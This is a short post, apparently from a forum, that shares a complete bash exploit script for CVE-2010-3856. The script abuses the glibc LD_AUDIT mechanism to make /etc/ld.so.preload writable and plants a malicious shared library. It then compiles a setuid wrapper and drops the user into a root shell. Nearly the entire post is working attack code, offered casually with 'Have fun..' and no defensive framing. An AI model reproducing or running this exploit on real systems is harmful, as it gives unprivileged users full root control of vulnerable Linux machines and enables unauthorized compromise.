Just thought it is worthy of posting…

#!/bin/bash
# CVE-2010-3856
# Author: deadbyte

OUTPUT=/etc/ld.so.preload

MASK=`umask`
umask 0
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$OUTPUT" ping 2> /dev/null
if [ ! -f $OUTPUT ]; then
echo "System does not appear to be vuln"
exit 0
fi
echo -n > $OUTPUT
umask $MASK

cat > sh.c << EOF
#include <unistd.h>
#include <stdio.h>

int main (int argc, char **argv, char **envp) {
char *args[] = { "/bin/bash", NULL };
setuid(geteuid());
setgid(getegid());
execve(args[0], args, envp);
perror("execve failed");
return 0;
}
EOF
gcc sh.c -o sh

cat > libpwn.c << EOF
#include <sys/stat.h>
#include <unistd.h>

uid_t getuid (void) {
chown("$PWD/sh", 0, 0);
chmod("$PWD/sh", S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH);
  return 0;
}
EOF
gcc -Wall -fPIC -c libpwn.c
gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o

echo "$PWD/libpwn.so" > $OUTPUT
ping 2> /dev/null
echo -n > $OUTPUT
./sh

Have fun..